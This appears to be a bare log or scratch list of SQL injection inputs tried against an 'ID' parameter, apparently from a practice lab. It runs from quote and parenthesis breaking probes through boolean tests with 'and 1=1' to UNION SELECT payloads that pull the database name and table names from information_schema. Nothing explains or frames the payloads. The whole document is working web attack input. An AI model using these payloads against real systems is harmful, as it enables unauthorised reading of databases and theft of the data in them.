ID:1
ID:1\
ID:1
ID:1'
ID:1')
ID:1"
ID:1")
ID:1") -- 
ID:1") -- 
ID:1") union select 1,1,1 limit 1,1 -- 
ID:1") -- 
ID:1
ID:1'
ID:1"
ID:1')
ID:1') limit 1,1 -- 
ID:1') union select 1,1,1 limit 1,1 -- 
ID:1") union select 1,1,1 limit 1,1 -- 
ID:1") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1 -- 
ID:1") union select 1,group_concat(table_name),1 from information_schema.tables where table_schema=database() limit 1,1 -- 
ID:1
ID:1"
ID:1" and 1=1"  --
ID:1" and 1=1" -- 
ID:1" and 1=1 -- 
ID:1" and "1"="1
ID:1" and "1"="2
ID:1
ID:1
ID:1'
ID:1"
ID:1' union select 1,database(),1 limit 1,1 -- 
ID:1"
ID:1")
ID:1)"
ID:1)" and 1=1 -- 
ID:1) and 1=1 -- 
ID:1) union select 1,database(),1 limit 1,1 -- 
ID:1") union select 1,database(),1 limit 1,1 -- 
